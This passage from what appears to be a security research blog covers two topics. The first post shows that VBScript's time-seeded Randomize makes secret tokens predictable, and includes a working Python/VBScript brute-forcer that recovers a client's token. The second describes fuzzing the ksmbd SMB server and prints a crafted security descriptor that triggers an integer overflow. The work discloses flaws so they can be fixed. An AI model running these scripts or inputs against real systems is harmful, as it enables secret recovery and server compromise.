If no seed is explicitly specified, Randomize uses Timer to set it (not entirely true, but we will get there). Timer() returns seconds since midnight as a Single value. Rnd() advances a global PRNG state and is fully deterministic for a given seed. Same seed, same sequence, like in other programming languages.

There are some problematic parts here, though. Windows’ default system clock tick is about 15.625 ms, i.e., 64 ticks per second. In other words, we get a new implicit seed value only once every 15.625 milliseconds.

Because the returned value is of type Single, we also get precision loss compared to a Double type. In fact, multiple “seeds” round to the same internal value. Think of collisions happening internally. As a result, there are way fewer unique sequences possible than you might think!

In practice there are at most 65,536 distinct effective seedings (details below). Because Timer() resets at midnight, the same set recurs each day.
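To put that number in perspective, the following Python sketch compares the entropy a 32-character token over this alphabet would ideally carry with what 65,536 effective seedings allow. It is a back-of-the-envelope calculation that assumes the seed does not change in the middle of a GenerateToken call; the constant names are made up for this example.

```python
import math

CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789()*&^%$#@!"
TOKEN_LENGTH = 32
EFFECTIVE_SEEDINGS = 65_536  # upper bound stated above
TICKS_PER_SECOND = 64        # 15.625 ms clock tick

# Entropy of a token drawn uniformly at random from the alphabet.
ideal_bits = TOKEN_LENGTH * math.log2(len(CHARS))
# Entropy actually available if every effective seeding were equally likely.
actual_bits = math.log2(EFFECTIVE_SEEDINGS)
# Number of distinct clock ticks in one day.
ticks_per_day = 24 * 60 * 60 * TICKS_PER_SECOND

if __name__ == "__main__":
    print(f"alphabet size:     {len(CHARS)}")
    print(f"ideal entropy:     {ideal_bits:.1f} bits")
    print(f"effective entropy: {actual_bits:.1f} bits")
    print(f"clock ticks/day:   {ticks_per_day}")
```

Even a full day of clock ticks is a small search space, and the effective number of distinct PRNG states is smaller still.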

We ran a local copy of the client’s code to generate unique tokens. During almost 10,000 runs, we managed to generate only 400 unique values. The remaining tokens were duplicates. As time passed, the duplicate ratio increased.

Of course the real goal here would be to recover the original secret. We can achieve that if we know the time of day when the GenerateToken function started. The more precise the value, the fewer computations are required. However, even if we have only a rough idea, like “minutes after midnight”, we can start at 00:00 and slowly increase our seed value by 15.625 milliseconds.

The PoC

We started by double-checking our strategy. We modified the initial code to use a seed value provided on the command line. Note that the same seed is used multiple times. While in the original code it is possible that the seed value changes between loop iterations, in practice that doesn’t happen often. We could expand our PoC to handle such scenarios as well, but we wanted to keep the code as clean as possible for readability.

Option Explicit

If WScript.Arguments.Count < 1 Then
	WScript.Echo "VBS_Error: Requires 1 seed argument."
	WScript.Quit(1)
End If

Dim seedToTest
seedToTest = WScript.Arguments(0)
WScript.Echo "Seed: " & seedToTest

Dim chars, n
chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789()*&^%$#@!"
n = 32

WScript.Echo "Predicted token: " & GenerateToken(chars, n, seedToTest)

function GenerateToken(chars, n, seed)
	Dim result, pos, i, charsLength
	charsLength = Int(Len(chars))	
	
	For i = 1 To n
		Randomize seed
		pos = Int((Rnd * charsLength) + 1)
		result = result & Mid(chars, pos, 1)
	Next
	
	GenerateToken = result	
end function

We took a precise Timer() value from another piece of code and used it as an input seed. Strangely though, it wasn’t working. For some reason we were ending up with a completely different PRNG state. It took a while before we understood that Randomize and Randomize Timer() aren’t exactly the same things.

VBScript was introduced by Microsoft in the mid-1990s as a lightweight, interpreted subset of Visual Basic. As of Windows 11 version 24H2, VBScript is a Feature on Demand (FOD). That means it is installed by default for now, but Microsoft plans to disable it in future versions and ultimately remove it. Still, the method of interest is implemented within the vbscript.dll library and we can take a look at vbscript!VbsRandomize:

; edi = argc
vbscript!VbsRandomize+0x50:
00007ffc`12d076a0 85ff            test    edi,edi            ; is argc == 0 ?
00007ffc`12d076a2 755b            jne     vbscript!VbsRandomize+0xaf ; if not zero, goto Randomize <seed> path

; otherwise, seed taken from current time
00007ffc`12d076a4 488d4c2420      lea     rcx,[rsp+20h]
00007ffc`12d076a9 48ff15...       call    GetLocalTime

; build "seconds" = hh*3600 + mm*60 + ss
00007ffc`12d076b5 0fb7442428      movzx   eax,word ptr [rsp+28h]
00007ffc`12d076ba 6bc83c          imul    ecx,eax,3Ch
00007ffc`12d076bd 0fb744242a      movzx   eax,word ptr [rsp+2Ah]
00007ffc`12d076c2 03c8            add     ecx,eax  
00007ffc`12d076c4 0fb744242c      movzx   eax,word ptr [rsp+2Ch]
00007ffc`12d076c9 6bd13c          imul    edx,ecx,3Ch
00007ffc`12d076cc 03d0            add     edx,eax

; convert milliseconds to double, divide by 1000.0
00007ffc`12d076ce 0fb744242e      movzx   eax,word ptr [rsp+2Eh]
00007ffc`12d076d3 660f6ec0        movd    xmm0,eax
00007ffc`12d076d7 f30fe6c0        cvtdq2pd xmm0,xmm0
00007ffc`12d076db 660f6eca        movd    xmm1,edx
00007ffc`12d076df f20f5e0599...   divsd   xmm0,[vbscript!_real]
00007ffc`12d076e7 f30fe6c9        cvtdq2pd xmm1,xmm1
00007ffc`12d076eb f20f58c8        addsd   xmm1,xmm0

; narrow down
00007ffc`12d076ef 660f5ac1        cvtpd2ps xmm0,xmm1         ; double -> float conversion
00007ffc`12d076f3 f30f11442420    movss   [rsp+20h],xmm0     ; spill float
00007ffc`12d076f9 8b4c2420        mov     ecx,[rsp+20h]      ; load as int bits

; ecx now holds 32-bit seed candidate

...

; code used later (in both cases) to mix into PRNG state
vbscript!VbsRandomize+0xda:
00007ffc`12d0772a 816350ff0000ff      and     dword [rbx+50h],0FF0000FFh  ; keep top/bottom byte
00007ffc`12d07731 8bc1                mov     eax,ecx
00007ffc`12d07733 c1e808              shr     eax,8
00007ffc`12d07736 c1e108              shl     ecx,8
00007ffc`12d07739 33c1                xor     eax,ecx
00007ffc`12d0773b 2500ffff00          and     eax,00FFFF00h
00007ffc`12d07740 094350              or      dword [rbx+50h],eax    

When we previously said that a bare Randomize uses Timer() as a seed, we weren’t exactly right. In reality, it’s just a call to WinAPI’s GetLocalTime. It computes seconds plus fractional milliseconds as a Double, then narrows it to Single (float) using the CVTPD2PS assembly instruction.

Let’s use a timer value of roughly 65860.48 as an example. As a Double, it is represented as 0x40f014479db22d0e in hex notation. After the narrowing conversion, our 0x40f014479db22d0e becomes 0x4780a23d, which is used as the seed input.

This is what happens otherwise, when the input is explicitly given:

; argc == 1, seed given
vbscript!VbsRandomize+0xaf:
00007ffc`12d076ff 33d2                xor     edx,edx
00007ffc`12d07701 488bce              mov     rcx,rsi
00007ffc`12d07704 e8...               call    vbscript!VAR::PvarGetVarVal
00007ffc`12d07709 ba05000000          mov     edx,5
00007ffc`12d0770e 488bc8              mov     rcx,rax              ; rcx = VAR* (value)
00007ffc`12d07711 e8...               call    vbscript!VAR::PvarConvert

00007ffc`12d07716 f20f104008          movsd   xmm0,mmword [rax+8]  ; load the double payload
00007ffc`12d0771b f20f11442420        movsd   [rsp+20h],xmm0       ; spill as 64-bit
00007ffc`12d07721 488b4c2420          mov     rcx,qword  [rsp+20h] ; rcx = raw IEEE-754 bits
00007ffc`12d07726 48c1e920            shr     rcx,20h              ; **take high dword** as seed source

When we do specify the seed value, it’s processed in an entirely different way. Instead of being converted using the CVTPD2PS opcode, it’s shifted right by 32 bits. So this time, our 0x40f014479db22d0e becomes 0x40f01447 instead. We end up with completely different seed input. This explains why we couldn’t properly reseed the PRNG.
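The two seed paths can be compared side by side with a minimal Python sketch. The function names are ours, not VBScript's; `struct` is used only to mimic the Double-to-Single narrowing and the 32-bit right shift seen in the disassembly.

```python
import struct

def bare_randomize_seed(seconds: float) -> int:
    """Bare Randomize: the Double is narrowed to a Single, whose raw bits are used."""
    return struct.unpack("<I", struct.pack("<f", seconds))[0]

def explicit_randomize_seed(value: float) -> int:
    """Randomize <value>: the high dword of the Double's raw bits is used."""
    return struct.unpack("<Q", struct.pack("<d", value))[0] >> 32

# The Double from the example above, rebuilt from its hex representation
timer = struct.unpack(">d", bytes.fromhex("40f014479db22d0e"))[0]

print(hex(bare_randomize_seed(timer)))      # 0x4780a23d
print(hex(explicit_randomize_seed(timer)))  # 0x40f01447
```

The same Double therefore yields two different 32-bit seed inputs, depending on which path is taken.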

Finally, the middle two bytes of the internal PRNG state are updated with a byte-swapped XOR mix of those bits, while the top and bottom bytes of the state are preserved.
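As a rough illustration, the mixing step from the disassembly can be written in a few lines of Python. The starting state 0x12345678 is a made-up value for demonstration, not the real initial PRNG state.

```python
def mix_seed(state: int, seed: int) -> int:
    """Mirror of the and/shr/shl/xor/and/or sequence at VbsRandomize+0xda."""
    kept = state & 0xFF0000FF                      # keep top and bottom byte
    mixed = (seed >> 8) ^ ((seed << 8) & 0xFFFFFFFF)
    return kept | (mixed & 0x00FFFF00)             # replace the middle two bytes

state = 0x12345678  # hypothetical previous state
print(hex(mix_seed(state, 0x4780A23D)))  # bare Randomize path   -> 0x12e5bd78
print(hex(mix_seed(state, 0x40F01447)))  # explicit seed path    -> 0x1254b778
```

Only 16 bits of the state depend on the seed, and the two seed paths still land on different states for the same timer value.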

Honestly, I was thinking about reimplementing all of that in Python to get a clearer view of what was going on. But then, Python reminded me that it handles arbitrarily large integers. The VBScript implementation, on the other hand, is full of potential integer overflows that Python simply doesn’t reproduce. Therefore, I kept the token-generation code as it was and implemented only the seed conversion in Python.

"""
Convert the time range given on the command line into all VBS-Timer()
values between them (inclusive) in **0.015625-second** steps (1/64 s),
turn each value into the special Double that `Randomize <seed>` expects,
feed the seed to VBS_PATH, parse the predicted token, and test it.

usage
    python brute_timer.py <start_clock> <end_clock>

examples
    python brute_timer.py "12:58:00 PM" "12:58:05 PM"
    python brute_timer.py "17:42:25.50" "17:42:27.00"

Both 12- and 24-hour clock strings are accepted; optional fractional
seconds are allowed.
"""

import subprocess
import struct
import sys
import re
from datetime import datetime


VBS_PATH    = r"C:\share\poc.vbs"

TICK       = 1 / 64               # 0.015 625 s  (VBS Timer resolution)
STEP       = TICK

def vbs_timer_value(clock_text: str) -> float:
    """Clock string to exact Single value returned by VBS's Timer()."""
    for fmt in ("%I:%M:%S %p", "%I:%M:%S.%f %p",
                "%H:%M:%S", "%H:%M:%S.%f"):
        try:
            t = datetime.strptime(clock_text, fmt).time()
            break
        except ValueError:
            continue
    else:
        raise ValueError("time format not recognised: " + clock_text)

    secs = t.hour*3600 + t.minute*60 + t.second + t.microsecond/1e6
    secs = round(secs / TICK) * TICK          # snap to nearest 1/64 s
    
    # force Single precision (float32) to match VBS mantissa exactly
    secs = struct.unpack('<f', struct.pack('<f', secs))[0]
    return secs


def make_manual_seed(timer_value: float) -> float:
    """Build the Double that Randomize <seed> receives"""
    single_le = struct.pack('<f', timer_value)   # 4 bytes  little-endian
    dbl_le    = b"\x00\x00\x00\x00" + single_le  # low dword zero, high dword = f32
    return struct.unpack('<d', dbl_le)[0]        # Python float (Double)

# ---------------------------------------------------------------------------
#   MAIN ROUTINE
# ---------------------------------------------------------------------------

def main():
    if len(sys.argv) != 3:
        print(__doc__)
        sys.exit(1)

    start_val = vbs_timer_value(sys.argv[1])
    end_val   = vbs_timer_value(sys.argv[2])

    if end_val < start_val:
        print("[ERROR] end time is earlier than start time")
        sys.exit(1)

    tried_tokens    = set()
    unique_tested   = 0
    success         = False

    print(f"[INFO] Range {start_val:.5f} to {end_val:.5f} in {STEP}-s steps")

    value = start_val
    while value <= end_val + 1e-7:          # small epsilon for fp rounding
        seed = make_manual_seed(value)
        try:
            vbs = subprocess.run([
                "cscript.exe", "//nologo", VBS_PATH, str(seed)
            ], capture_output=True, text=True, check=True)
        except subprocess.CalledProcessError as e:
            print(f"[ERROR] VBS failed for seed {seed}: {e}")
            value += STEP
            continue

        m = re.search(r"Predicted token:\s*(.+)", vbs.stdout)
        if not m:
            print(f"[{value:.5f}] No token from VBS")
            value += STEP
            continue

        token = m.group(1).strip()
        if token in tried_tokens:
            value += STEP
            # print(f"Duplicate for [{value:.5f}] / seed: {seed}: {token}")
            continue
        tried_tokens.add(token)
        unique_tested += 1
        print(f"[{value:.5f}] Test #{unique_tested}: {token} // calculated seed: {seed}")
        
        # ...logic omitted - but we need some sort of token verification here

        value += STEP

if __name__ == "__main__":
    main()

The Attack

Now, we can run the base code and capture a semi-precise current time value. Our Python script expects properly formatted clock strings, so we convert the number using a simple method:

Dim t, whole, hh, mm, ss, us
t = Timer()

' \ and Mod round their operands to integers, so truncate the seconds first
whole = Int(t)
hh = whole \ 3600
mm = (whole Mod 3600) \ 60
ss = whole Mod 60
us = Int((t - whole) * 1000000)   ' fractional part in microseconds

WScript.Echo _
    Right("0" & hh, 2) & ":" & _
    Right("0" & mm, 2) & ":" & _
    Right("0" & ss, 2) & "." & _
    Right("000000" & CStr(us), 6)

Let’s say the token was generated precisely at 17:55:54.046875 and we got the QK^XJ#QeGG8pHm3DxC28YHE%VQwGowr7 string. In the case of our target, we knew that some files were created at 17:55:54, which was rather close to the token-generation time. In other cases, the information leak could come from some resource creation metadata, entries in the log file, etc.

We iterate time seeds in 0.015625-second steps (64 Hz) across the suspected window and we filter all duplicates.

We started our brute_timer.py script with a 1s range and we successfully recovered the secret in the 4th iteration:

PS C:\share> python3 .\brute_timer.py 17:55:54 17:55:55
[INFO] Range 64554.00000 to 64555.00000 in 0.015625-s steps
[64554.00000] Test #1: eYIkXKdsUTC3Uz#R)P$BlVRJie9U2(4B // calculated seed: 2.3397787718772567e+36
[64554.01562] Test #2: ZTDgSGZnPP#yQv*M6L)#hQNEdZ5Px50$ // calculated seed: 2.3397838424796576e+36
[64554.03125] Test #3: VP!bOBUjLK&uLq8I2G7*cMIAZV0Lt1v* // calculated seed: 2.3397889130820585e+36
[64554.04688] Test #4: QK^XJ#QeGG8pHm3DxC28YHE%VQwGowr7 // calculated seed: 2.3397939836844594e+36
[...snip...]

VBScript’s Randomize and Rnd are fine if you just want to roll some dice on screen, but don’t even think about using them for secrets.

ksmbd - Fuzzing Improvements and Vulnerability Discovery (2/3)

2025-09-02T00:00:00+02:00

Introduction

This is a follow-up to the article originally published here.

Our initial research uncovered several unauthenticated bugs, but we had only touched the attack surface lightly. Even after patching the code to bypass authentication, most interesting operations required interacting with handlers and state we initially omitted. In this part, we explain how we increased coverage and applied different fuzzing strategies to identify more bugs.

Some functionalities require additional configuration options. We tried to enable many available features to maximize the exposed attack surface. This helped us trigger code paths that are disabled in the minimalistic configuration example. However, to simplify our setup, we did not consider features like Kerberos support or RDMA. These could be targets for further improvement.

Configuration-Dependent Attack Surface

The following functionalities helped expand the attack surface. Only oplocks are enabled by default.

G = Global scope only
S = Per-share, but can also be set globally as a default

durable handles (G)
oplocks (S)
server multi channel support (G)
smb2 leases (G)
vfs objects (S)

From a code perspective, in addition to smb2pdu.c, these source files were involved:

ndr.c – NDR encoding/decoding used in SMB structures
oplock.c – Oplock request and break handling
smbacl.c – Parsing and enforcement of SMB ACLs
vfs.c – Interface to virtual file system operations
vfs_cache.c – Cache layer for file and directory lookups

The remaining files in the fs/smb/server directory were either part of standard communication or exercising them required a more complex setup, as in the case of various authentication schemes.

Fuzzer Improvements

SMB3 expects a valid session setup before most operations, and its authentication flow is multi-step, requiring correct ordering. Implementing valid Kerberos authentication was impractical for fuzzing.

As described in the first part, we patched the NTLMv2 authentication to be able to interact with resources. We also explicitly allowed guest accounts and specified map to guest = bad user to allow a fallback to “guest” when credentials were invalid. After reporting CVE-2024-50285: ksmbd: check outstanding simultaneous SMB operations, credit limitations became more strict, so we patched that out as well to avoid rate limiting.

A few minutes after we restarted syzkaller with a larger corpus, all remaining candidates were rejected. After some investigation, we realized it was due to the default max connections = 128, which we had to increase to the maximum value of 65536. No other limits were changed.

State Management

SMB interactions are stateful, relying on sessions, TreeIDs, and FileIDs. Fuzzing required simulating valid transitions like smb2_create ⇢ smb2_ioctl ⇢ smb2_close. When we initiated operations such as smb2_tree_connect, smb2_sess_setup, or smb2_create, we manually parsed responses in the pseudo-syscall to extract resource identifiers and reused them in subsequent calls. Our harness was programmed to send multiple messages per pseudo-syscall.

Example code for resources parsing is displayed below:

// process response. does not contain +4B PDU length
void process_buffer(int msg_no, const char *buffer, size_t received) {
  // .. snip ..

  // Extract SMB2 command
  uint16_t cmd_rsp = u16((const uint8_t *)(buffer + CMD_OFFSET));
  debug("Response command: 0x%04x\n", cmd_rsp);

  switch (cmd_rsp) {
    case SMB2_TREE_CONNECT:
      if (received >= TREE_ID_OFFSET + sizeof(uint32_t)) {
        tree_id = u32((const uint8_t *)(buffer + TREE_ID_OFFSET));
        debug("Obtained tree_id: 0x%x\n", tree_id);
      }
      break;

    case SMB2_SESS_SETUP:
      // First session setup response carries session_id
      if (msg_no == 0x01 &&
          received >= SESSION_ID_OFFSET + sizeof(uint64_t)) {
        session_id = u64((const uint8_t *)(buffer + SESSION_ID_OFFSET));
        debug("Obtained session_id: 0x%llx\n", session_id);
      }
      break;

    case SMB2_CREATE:
      if (received >= CREATE_VFID_OFFSET + sizeof(uint64_t)) {
        persistent_file_id = u64((const uint8_t *)(buffer + CREATE_PFID_OFFSET));
        volatile_file_id   = u64((const uint8_t *)(buffer + CREATE_VFID_OFFSET));
        debug("Obtained p_fid: 0x%llx, v_fid: 0x%llx\n",
              persistent_file_id, volatile_file_id);
      }
      break;

    default:
      debug("Unknown command (0x%04x)\n", cmd_rsp);
      break;
  }
}
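For readers who prefer to prototype this outside the harness, here is a minimal Python sketch of the same extraction logic. The offsets are our reading of the SMB2 header and CREATE response layout in MS-SMB2; the constants used in the C harness are not shown in this post, so treat the numeric values as assumptions.

```python
import struct

SMB2_HEADER_SIZE = 64
CMD_OFFSET = 12                                 # Command (2 bytes)
TREE_ID_OFFSET = 36                             # TreeId (4 bytes)
SESSION_ID_OFFSET = 40                          # SessionId (8 bytes)
CREATE_PFID_OFFSET = SMB2_HEADER_SIZE + 64      # FileId.Persistent in CREATE response
CREATE_VFID_OFFSET = CREATE_PFID_OFFSET + 8     # FileId.Volatile

SMB2_SESS_SETUP, SMB2_TREE_CONNECT, SMB2_CREATE = 0x0001, 0x0003, 0x0005

def extract_ids(buf: bytes) -> dict:
    """Return the resource identifiers carried by one SMB2 response (no 4-byte length prefix)."""
    ids = {}
    if len(buf) < SMB2_HEADER_SIZE or buf[:4] != b"\xfeSMB":
        return ids
    (cmd,) = struct.unpack_from("<H", buf, CMD_OFFSET)
    if cmd == SMB2_TREE_CONNECT:
        (ids["tree_id"],) = struct.unpack_from("<I", buf, TREE_ID_OFFSET)
    elif cmd == SMB2_SESS_SETUP:
        (ids["session_id"],) = struct.unpack_from("<Q", buf, SESSION_ID_OFFSET)
    elif cmd == SMB2_CREATE and len(buf) >= CREATE_VFID_OFFSET + 8:
        ids["persistent_file_id"], ids["volatile_file_id"] = struct.unpack_from(
            "<QQ", buf, CREATE_PFID_OFFSET)
    return ids

# Synthetic TREE_CONNECT response header, for demonstration only
hdr = bytearray(SMB2_HEADER_SIZE)
hdr[:4] = b"\xfeSMB"
struct.pack_into("<H", hdr, CMD_OFFSET, SMB2_TREE_CONNECT)
struct.pack_into("<I", hdr, TREE_ID_OFFSET, 0x1234)
print(extract_ids(bytes(hdr)))
```

Unlike the C version, this sketch does not track the message number, so it would take the session ID from any session setup response rather than only the first one.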

Another issue we had to solve was that ksmbd relies on global state, such as memory pools and session tables, which makes fuzzing less deterministic. We tried enabling the experimental reset_acc_state feature to reset accumulated state, but it slowed down fuzzing significantly. We decided not to worry much about reproducibility, since each bug typically appeared in dozens or even hundreds of test cases. For the rest, we used focused fuzzing, as described below.

Protocol Specification

We based our harness on the official SMB protocol specification by implementing a grammar for all supported SMB commands. Microsoft publishes detailed technical documents for SMB and other protocols as part of its Open Specifications program.

As an example, the wire format of the SMB2 IOCTL Request is shown below:

We then manually rewrote this specification into our grammar, which allowed our harness to automatically construct valid SMB2 IOCTL requests:

smb2_ioctl_req {
        Header_Prefix           SMB2Header_Prefix
        Command                 const[0xb, int16]
        Header_Suffix           SMB2Header_Suffix
        StructureSize           const[57, int16]
        Reserved                const[0, int16]
        CtlCode                 union_control_codes
        PersistentFileId        const[0x4, int64]
        VolatileFileId          const[0x0, int64]
        InputOffset             offsetof[Input, int32]
        InputCount              bytesize[Input, int32]
        MaxInputResponse        const[65536, int32]
        OutputOffset            offsetof[Output, int32]
        OutputCount             len[Output, int32]
        MaxOutputResponse       const[65536, int32]
        Flags                   int32[0:1]
        Reserved2               const[0, int32]
        Input                   array[int8]
        Output                  array[int8]
} [packed]
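To make the roles of offsetof and bytesize more concrete, the sketch below packs the fixed part of an SMB2 IOCTL request by hand in Python. It is not part of our harness; the function name and the example control code (FSCTL_VALIDATE_NEGOTIATE_INFO, 0x00140204) are chosen only for illustration, and the SMB2 header itself is left out.

```python
import struct

SMB2_HEADER_SIZE = 64
IOCTL_FIXED_SIZE = 56   # StructureSize is 57: 56 fixed bytes plus one byte of buffer

def build_ioctl_body(ctl_code: int, persistent_fid: int, volatile_fid: int,
                     input_data: bytes = b"", flags: int = 1) -> bytes:
    """Pack the IOCTL request body; offsets are counted from the start of the SMB2 header."""
    input_offset = SMB2_HEADER_SIZE + IOCTL_FIXED_SIZE   # what offsetof[Input] resolves to
    fixed = struct.pack(
        "<HHIQQ" + "I" * 8,
        57, 0, ctl_code, persistent_fid, volatile_fid,
        input_offset, len(input_data), 65536,   # InputOffset, InputCount, MaxInputResponse
        0, 0, 65536,                            # OutputOffset, OutputCount, MaxOutputResponse
        flags, 0)                               # Flags, Reserved2
    return fixed + input_data

body = build_ioctl_body(0x00140204, 0x4, 0x0, b"\x00" * 24)
print(len(body))  # 80
```

In the syzkaller grammar, these offsets and counts are recomputed automatically after every mutation, which is why they are not declared as plain integers.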

We did a final check against the source code to identify and verify possible mismatches during our translation.

Fuzzing Strategies

Since we were curious about the bugs that might be missed when using only the default syzkaller configuration with a corpus generated from scratch, we explored different fuzzing approaches, each of which is described in the following subsections.

FocusAreas

Occasionally, we triggered a bug that we were not able to reproduce, and it was not immediately clear from the crash log why it occurred. In other cases, we wanted to focus on a parsing function that had weak coverage. The experimental focus_areas option allows exactly that.

For instance, by targeting smb_check_perm_dacl with

"focus_areas": [
  {"filter": {"functions": ["smb_check_perm_dacl"]}, "weight": 20.0},
  {"filter": {"files": ["^fs/smb/server/"]}, "weight": 2.0},
  {"weight": 1.0}
]

we identified multiple integer overflows and were able to quickly suggest and confirm the patch.

To reach the vulnerable code, syzkaller constructed an ACL that passed validation and led to an integer overflow. After rewriting it in Python, it looked like this:

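import struct

def build_sd():
    # 0x14-byte security descriptor header; field names assumed from ksmbd's struct smb_ntsd
    sd = bytearray(0x14)

    sd[0x00] = 0x00
    sd[0x01] = 0x00                               # revision
    struct.pack_into("<H", sd, 0x02, 0x0001)      # type
    struct.pack_into("<I", sd, 0x04, 0x78)        # osidoffset
    struct.pack_into("<I", sd, 0x08, 0x00)        # gsidoffset
    struct.pack_into("<I", sd, 0x0C, 0x10000)     # sacloffset
    struct.pack_into("<I", sd, 0x10, 0xFFFFFFFF)  # dacloffset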

    while len(sd) < 0x78:
        sd += b"A"

    sd += b"\x01\x01\x00\x00\x00\x00\x00\x00"
    sd += b"\xCC" * 64

    return bytes(sd)

sd = build_sd()
print(f"[+] Final SD length: {len(sd)}")
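Why a dacloffset of 0xFFFFFFFF is interesting can be shown with a simplified model. The snippet below is not the kernel code; it only illustrates the general bug class, assuming the offset is held in a signed 32-bit integer and an 8-byte ACL header is added to it before the bounds check.

```python
import ctypes

ACL_HEADER_SIZE = 8  # assumed size of the ACL header, for illustration only

def naive_bounds_check(pntsd_size: int, dacloffset: int) -> bool:
    """Signed 32-bit arithmetic: the addition can wrap and slip past the check."""
    off = ctypes.c_int32(dacloffset).value            # 0xFFFFFFFF becomes -1
    end = ctypes.c_int32(off + ACL_HEADER_SIZE).value
    return end <= pntsd_size                          # True means "accepted"

def safe_bounds_check(pntsd_size: int, dacloffset: int) -> bool:
    """Unsigned comparison that cannot wrap."""
    return pntsd_size >= ACL_HEADER_SIZE and dacloffset <= pntsd_size - ACL_HEADER_SIZE

size = 0xC0  # length of the descriptor produced by build_sd()
print(naive_bounds_check(size, 0xFFFFFFFF))  # True
print(safe_bounds_check(size, 0xFFFFFFFF))   # False
```

The naive variant accepts an offset that points far outside the buffer, while both variants agree on ordinary offsets such as 0x20.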

ANYBLOB

The anyTypes struct is used internally during fuzzing and is sparsely documented, probably because it’s not intended to be used directly. It is defined in prog/any.go and can represent multiple structures:

type anyTypes struct {
	union  *UnionType
	array  *ArrayType
	blob   *BufferType
    // .. snip..
}

Implemented in commit 9fe8aa4, the use case is to squash complex structures into a flat byte array, and apply just generic mutations.

The test case illustrates how it works. The following program:

foo$any_in(&(0x7f0000000000)={0x11, 0x11223344, 0x2233, 0x1122334455667788, {0x1, 0x7, 0x1, 0x1, 0x1bc, 0x4}, [{@res32=0x0, @i8=0x44, "aabb"}, {@res64=0x1, @i32=0x11223344, "1122334455667788"}, {@res8=0x2, @i8=0x55, "cc"}]})

translates to

foo$any_in(&(0x7f0000000000)=ANY=[@ANYBLOB="1100000044332211223300000000000088776655443322117d00bc11", @ANYRES32=0x0, @ANYBLOB="0000000044aabb00", @ANYRES64=0x1, @ANYBLOB="443322111122334455667788", @ANYRES8=0x2, @ANYBLOB="0000000000000055cc0000"])

The translation happens automatically as part of the fuzzing process. After running the fuzzer for several weeks, it stopped producing new coverage. Instead of manually writing inputs that followed the grammar and reached new paths, we used ANYBLOB, which allowed us to generate them easily.

The ANYBLOB is represented as a BufferType data type and we used public pcaps obtained here and here to generate a new corpus.

import json
import os

# tshark -r smb2_dac_sample.pcap -Y "smb || smb2" -T json -e tcp.payload > packets.json

os.makedirs("corpus", exist_ok=True)

def load_packets(json_file):
    with open(json_file, 'r') as file:
        data = json.load(file)
    
    packets = [entry["_source"]["layers"]["tcp.payload"] for entry in data]
    
    return packets

if __name__ == "__main__":
    json_file = "packets.json"
    packets = load_packets(json_file)
    
    for i, packet in enumerate(packets):
        pdu_size = len(packet[0]) // 2  # tcp.payload is a hex string: two characters per byte
        filename = f"corpus/packet_{i:03d}.txt"
        with open(filename, "w") as f:
            f.write(f"syz_ksmbd_send_req(&(0x7f0000000340)=ANY=[@ANYBLOB=\"{packet[0]}\"], {hex(pdu_size)}, 0x0, 0x0)")

After that, we used syz-db to pack all candidates into the corpus database and resumed fuzzing.

With that, we were able to immediately trigger ksmbd: fix use-after-free in ksmbd_sessions_deregister() and improve overall coverage by a few percent.

Sanitizer Coverage Beyond KASAN

In addition to KASAN, we tried other sanitizers such as UBSAN and KCSAN. There was no significant improvement: KCSAN produced many false positives or reported bugs in unrelated components with seemingly no security impact. Interestingly, UBSAN was able to identify one additional issue that KASAN did not detect:

id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);

In this case, the user was able to set psid->num_subauth to 0, which resulted in an incorrect read psid->sub_auth[-1]. Although this access still fell within the same struct allocation (smb_sid), UBSAN’s array index bounds check considered the declared bounds of the array

struct smb_sid {
	__u8 revision; /* revision level */
	__u8 num_subauth;
	__u8 authority[NUM_AUTHS];
	__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
} __attribute__((packed));

and was therefore able to catch the bug.
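A small ctypes model makes the distinction visible. The values NUM_AUTHS = 6 and SID_MAX_SUB_AUTHORITIES = 15 are assumed here; no explicit packing is needed because the fields are naturally aligned.

```python
import ctypes

NUM_AUTHS = 6                  # assumed value of the kernel constant
SID_MAX_SUB_AUTHORITIES = 15   # assumed value of the kernel constant

class SmbSid(ctypes.Structure):
    _fields_ = [
        ("revision", ctypes.c_uint8),
        ("num_subauth", ctypes.c_uint8),
        ("authority", ctypes.c_uint8 * NUM_AUTHS),
        ("sub_auth", ctypes.c_uint32 * SID_MAX_SUB_AUTHORITIES),
    ]

def last_subauth_access(num_subauth: int):
    """Return (array index, byte offset in the struct) of sub_auth[num_subauth - 1]."""
    index = num_subauth - 1
    return index, SmbSid.sub_auth.offset + 4 * index

index, offset = last_subauth_access(0)
print(index, offset, ctypes.sizeof(SmbSid))  # -1 4 68
print(0 <= offset < ctypes.sizeof(SmbSid))   # True: still inside the allocation
print(0 <= index < SID_MAX_SUB_AUTHORITIES)  # False: outside the declared array bounds
```

The read lands on the last four bytes of authority, so an allocation-based checker has nothing to complain about, whereas an index-based check flags it.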

Coverage

One unresolved issue was fuzzing with multiple processes. Due to various locking mechanisms, and because we reused the same authentication state, we noticed that fuzzing was more stable and coverage increased faster when using only one process. We sent multiple requests within a single invocation, but initially worried that this would cause us to miss race conditions.

If we check the execution log, we see that syzkaller creates multiple threads inside one process, the same way it does when calling standard syscalls:

1.887619984s ago: executing program 0 (id=1628):
syz_ksmbd_send_req(&(0x7f0000000d40)={0xee, @smb2_read_req={{}, 0x8, {0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x1, "fbac8eef056a860726ca964fb4f60999"}, 0x31, 0x6, 0x2, 0x7e, 0x70, 0x4, 0x0, 0xffffffff, 0x2, 0x7, 0xee, 0x0, "1cad48fb0cba2f253915fe074290eb3e10ed9ac895dde2a575e4caabc1f3a537e265fea8a440acfd66cf5e249b1ccaae941160f24282c81c9df0260d0403bb44b0461da80509bd756c155b191718caa5eabd4bd89aa9bed58bf87d42ef49bca4c9f08f22d495b601c9c025631b815bf6cbeb0aa4785aec4abf776d75e5be"}}, 0xf2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
syz_ksmbd_send_req(&(0x7f0000000900)=ANY=[@ANYRES16=<r0=>0x0], 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) (async, rerun: 32)
